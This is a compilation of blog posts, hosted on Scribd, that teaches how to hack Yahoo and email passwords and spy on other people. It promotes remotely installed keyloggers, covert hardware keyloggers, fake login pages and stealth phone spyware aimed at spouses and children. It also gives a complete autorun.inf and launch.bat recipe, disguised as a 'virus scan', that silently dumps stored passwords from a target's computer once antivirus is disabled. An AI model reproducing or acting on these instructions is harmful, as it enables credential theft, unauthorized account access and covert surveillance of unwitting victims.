0% found this document useful (0 votes)
455 views

Hacking Stuff: 1. Easiest Way To Hack Yahoo Password

This document discusses methods for hacking Yahoo passwords. It begins by stating that the only reliable methods are keylogging and phishing. It then provides details on how to use keyloggers like SniperSpy and WinSpy to hack passwords. The document also covers creating fake login pages through phishing to steal passwords. Finally, it discusses using a USB drive to automatically run password-stealing tools on a target computer without the user's knowledge. Throughout, it cautions that most other common "hacking" methods found online are scams.

Uploaded by

Deepak Sharma
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
455 views

Hacking Stuff: 1. Easiest Way To Hack Yahoo Password

This document discusses methods for hacking Yahoo passwords. It begins by stating that the only reliable methods are keylogging and phishing. It then provides details on how to use keyloggers like SniperSpy and WinSpy to hack passwords. The document also covers creating fake login pages through phishing to steal passwords. Finally, it discusses using a USB drive to automatically run password-stealing tools on a target computer without the user's knowledge. Throughout, it cautions that most other common "hacking" methods found online are scams.

Uploaded by

Deepak Sharma
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 12

Hacking stuff

Everyday I get a lot of emails from people asking How to hack a Yahoo password? So if you’re curious to know
how to hack a yahoo password then this is the post for you. In this post I will give you the real and working ways to
hack Yahoo password. 
There are number of sites on the web that provide information to hack a Yahoo password. So what’s special about
this site? The only special about this site is that we do not bluff and mislead the readers. We actually teach you
the real and working ways to hack a Yahoo password rather than telling some nonsense tricks to crack or hack
some one’s yahoo password.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING
With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO
ways to hack a Yahoo password: They are Keylogging and Phishing. All the other ways are scams! Here is a list of 
facts that you need to know about hacking Yahoo password.
1. There is no ready made software or program that can hack a Yahoo password just by entering the target
username. If you come accross a site that claims to sell a program to hack Yahoo password then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Yahoo password just for $100 or $200. All the hacking
services are scams.

The following are the only 2 foolproof methods to hack a Yahoo password.


 

1. EASIEST WAY TO HACK YAHOO PASSWORD


 

Using keylogger is the easiest way to hack a Yahoo password. Any one with a basic knowledge of computer can use
a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer.
The following are some of the frequently asked questions about keyloggers.

1. What is a keylogger?
A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a
specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.

2. Where can I get the keylogger?


There exists hundrends of keyloggers on the internet. But most of them are of poor quality and fail to deliver a good
performance. The two best keyloggers for hacking yahoo password are listed below.

SniperSpy (Supports Remote Installation)


Win-Spy (Supports Remote Installation)
For more information on keyloggers, installation procedure and FAQs please refer my previous post:How to Hack an
Email Account
3. Which keylogger is the best to hack Yahoo password? 
Both the above mentioned ones are best for hacking Yahoo. However I recommend SniperSpy since it is more
reliable and has got a better advantage over WinSpy. To get a complete review of SniperSpy please see my new
post Which Spy Software to Choose
If you’re really serious to hack  a Yahoo password then I strongly recommend using either of the two mentioned
keyloggers.

For a complete installation guide and more information on these two softwares visit the following links

 1. SniperSpy      2. WinSpy
NOTE: WHEN YOU USE A KEYLOGGER TO HACK AN EMAIL ACCOUNT IT IS HIGHLY RECOMMENDED
TO HIDE YOUR REAL IP ADDRESS. SO WE RECOMMEND THE FOLLOWING IP HIDING SOFTWARE
Hide the IP
2. OTHER WAYS TO HACK YAHOO PASSWORD
 

The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing).
Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page
that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end
up loosing it.
Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but
the entered details(username & password) are redirected to remote server and we get redirected to some other page.
Many times we ignore this but finally we loose our valuable data.

However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job.
It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to
the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo. Because Keyloggers are
the easiest way to hack Yahoo passwor
How to Sniff Passwords Using USB Drive
Submitted by Srikanth on Saturday, 7 February 2009127 Comments

As we all know, Windows stores most of the passwords


which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts
and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these
passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff
passwords from any computer. We need the following tools to create our rootkit.

 
 
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows
Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian,
Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000
(POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts),
IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use
the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It
supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the
AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords,
and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and
passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your
current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password
entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field,
Password Field, and the Signons filename. 
Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from

New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to
sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few
seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
Email Password Hacking
Submitted by Srikanth on Monday, 4 February 200840 Comments

Most of the people ask me to teach the easiest way of email password hacking. In fact the most widely asked
question on hacking is some or the other way related to email password hacking. Even if you have the similar
question in your mind here’s the answer. First of all don’t get fooled by the so called the “easiest way to hack an email
password” given on many scam sites. Here’s the scam procedure. This method is of hacking password never works.
—–<THIS IS SCAM. DO NOT TRY, BUT JUST READ IT>——
>>STEP 1- Log in to your account (yahoo,hotmail,gmail etc.)

>>STEP 2- Click on Compose


>>STEP 3- In the subject type exactly as follows

Password Retrieval

>>STEP 4- In the to address exactly type the following email address

retrieve_mypass@yahoo.com (for yahoo)
send_mypass@hotmail.com(for hotmail)
googlepass_reset@gmail.com(for gmail)
>>STEP 4- Body of the mail

In the first line type your own email address and in the next line your password.

NOTE: This step is the most important,so do it exactly as instructed.


Heres the example

myemailid@yahoo.com
iamafool
Give exactly 4 lines gap after this.
Now type the email address of the person you want hack.
In the next line type the following code exactly as given below
**yyb67hhfy@#yssyhhdiuhhyahoo.comsi*8??” (for yahoo)
**yyb67hhfy@#yssyhhdiuhhhotmail.comsi*8??” (for hotmail)
**yyb67hhfy@#yssyhhdiuhhgoogle.comsi*8??” (for gmail)
>>STEP 5- Now Send the mail and check your inbox after a few hours. The victims password is mailed to you by the
password resetting server.This is a major bug in most of the hosts such as yahoo,gmail etc. Here the server is
confused and it sends you the password of the victim.

———-<SCAM PART ENDS>———-


Never ever try this trick. If tried you definitely loose up your own password. Let’s see how the above mail works.
First of all the “To address” of the mail is none other than the ID of the person who has written this trick. This email
has no special value,it’s none other than an ordinary email address belonging to a user like you, not the server email
address. So you are just mailing your own ID and the password to a stranger in attempt to hack other’s password. All
the other rules such as line gaps,codes etc. are utter nonsense, just given to make you believe it is true. So the
bottom line is never believe/try these hacks. These method is called Social Engineering where the people are made
to mail their own username and password to the hacker’s ID. So here the people get fooled and loose their password
in attempting to hack some other’s password.
The real ways of password hacking involves usage of a keylogger program. The keylogger is a stealth program which
hides it’s existence but secretly record’s all the keystrokes which includes even the password. The other ways
of password hacking involves usage of trojans,Creating fake login pages etc. These tricks are discussed in detail in
the post Hacking An Email Account.  This is the post which cover’s the complete details of email hacking
How to Hack an Email using Hardware Keylogger
Submitted by Srikanth on Sunday, 21 September 200813 Comments

Did you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed
information on hardware keyloggers and their use.I will also teach how to hack an email using hardware keylogger. If
you are new to the concept of keyloggers or haven’t read my previous post about email hacking then you must refer
my previous post Hacking an email account. Here i’ll give a breif description about keyloggers.
A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered
through the keyboard.
Now i’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user
keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal
memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware
keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can
never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here
are some of the images of hardware keyloggers for your convenience.

So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2
device. So it is very hard to identify it as a keylogger.

Insatalling a Hardware Keylogger to Hack the Email


Password
The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you
have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The
following image shows how the keylogger is installed.
Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and
every keystroke of the keyboard including email passwords and other confidential information. The hardware
keylogger has an inbuilt memory in which the logs are stored
Cell Phone Spy – How to Spy on Cell Phones
Submitted by Srikanth on Sunday, 21 June 200915 Comments

Cell Phone Spy – How to Spy on a Cell Phone


 

Are you curious to know how to spy on a cell phone? Do you want to secretly spy on SMS
text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a
detailed tutorial on how to spy on cell phones.
Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you
need to know the following facts.

1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the cell phone
spy software.
2. Cell phone spy softwares are compatible with the following type of phones (operating systems).
1. Symbian OS (Most Nokia Phones)
2. Apple iphone
3. Windows Mobile
For a complete list of compatible cell phones visit the Mobile Spy site and click on Compatiblity link present on the
left hand sidebar. 
Today most of the modern cell phones are loaded with one of the above three operating systems and hence
compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish
this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler
for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the
following cell phone spy software to be the best one.

Mobile Spy  - The No.1 Cell Phone Spy Software


Mobile Spy is a perfect tool for parents to monitor their childern’s activity on thier cell phone!
Mobile Spy Features
Mobile Spy is a hybrid spy software/service which allows you to spy on your target cell phone in real time. This
unique system records the activities of anyone who uses the compatible cell phone ( iPhone, Windows Mobile or
Symbian OS smartphone). For this you need to install a small application onto the cell phone. This application starts
at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the
background and will spy on every activity that takes place on the phone.
Logging Features
1. Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.

2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.

3. The phones’s current location is frequently logged using GPS when signal is available.

4. Each address entered into Internet Explorer (or any browser) is logged.

5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know
about the presence of this software.

How it works
The working of Mobile Spy is very simple and needs no extra knowledge to install and use.
Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a
username and password for you online control panel.

Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the
software starts recording all the activities on the cell phone.

Step 3- Login to your online control panel to see the logs containing the recorded information.

This is just a small list of it’s features. For a list of compatible phones, step-by-step installation guide and more details
visit the following link

Mobile Spy
 

Why Mobile Spy?


Mobile Spy is one of the best and award winning cell phone spy softwares on the market with an affordable price.
Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell
phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to
perform cell phone spying. So what are you waiting for? Go grab Mobile Spy and expose the truth
What is Phishing ?
Submitted by Srikanth on Sunday, 20 January 200830 Comments

P hishing is an attempt to criminally and fraudulently acquire

sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in
an electronic communication. eBay, PayPal and other online banks are common targets. Phishing is typically carried
out by email or instant messaging and often directs users to enter details at a website, although phone contact has
also been used. Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the
growing number of reported phishing incidents include legislation, user training, public awareness, and technical
measures.
Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites
such as Orkut are also a target of phishing.

Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a
fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username
& password by replaying to a given email address.

TECHNIQUES BEHIND PHISHING ATTACK


1.Link Manipulation
Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong
to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks
used by phishers, such as this example URL

www.micosoft.com
www.mircosoft.com
www.verify-microsoft.com

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy